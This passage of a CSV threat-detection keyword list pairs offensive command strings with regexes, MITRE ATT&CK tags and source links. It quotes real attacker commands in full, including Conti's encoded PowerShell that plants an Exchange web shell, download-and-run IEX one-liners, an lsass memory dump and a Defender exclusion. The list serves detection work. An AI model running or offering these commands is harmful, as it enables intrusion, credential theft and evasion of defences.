OAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*",".{0,1000}powershell\s\-enc\sJABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAVwBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #3","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -enc QwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\sQwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #4","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString\(.{0,1000}\)\s\sGet\-NetComputer\s\-FullData\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\.ps1.{0,1000}Get\-NetComputer\s\-FullData.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell Invoke-WebRequest ""http://0.0.0.0:8001/test.exe*",".{0,1000}powershell\sInvoke\-WebRequest\s\""http\:\/\/0\.0\.0\.0\:8001\/test\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*powershell Invoke-WebRequest http*.bat *",".{0,1000}powershell\sInvoke\-WebRequest\shttp.{0,1000}\.bat\s.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*Powershell LDAPWordlistHarvester*",".{0,1000}Powershell\sLDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*",".{0,1000}powershell\s\-nop\s\-exec\sbypass\s\-EncodedCommand\sSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -command ""Add-MpPreference -ExclusionExtension "".exe""*",".{0,1000}powershell\.exe\s\-command\s\""Add\-MpPreference\s\-ExclusionExtension\s\""\.exe\"".{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*powershell.exe -command *Enable-PSRemoting -Force* -ComputerName *",".{0,1000}powershell\.exe\s\-command\s.{0,1000}Enable\-PSRemoting\s\-Force.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*powershell.exe -enc $B64ServerScript*",".{0,1000}powershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sipconfig\s\/all.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass ps lsass*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sps\slsass.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass quser*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\squser.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\srundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll.{0,1000}\sMiniDump\s.{0,1000}\sC\:\\programdata\\a\.zip\sfull.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass Password1234*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sStart\-Process\sc\:\\windows\\SVN\.exe\s\-ArgumentList\s.{0,1000}\-connect\s.{0,1000}\s\-pass\sPassword1234.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *",".{0,1000}powershell\.exe\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Command\s.{0,1000}Action\s\=\sNew\-ScheduledTaskAction\s\-Execute\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powershell.exe nothing to see here! :-P*",".{0,1000}powershell\.exe\snothing\sto\ssee\shere!\s\:\-P.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*powershell_code_execution_invoke_assembly*",".{0,1000}powershell_code_execution_invoke_assembly.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_collection_keylogger*",".{0,1000}powershell_collection_keylogger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - 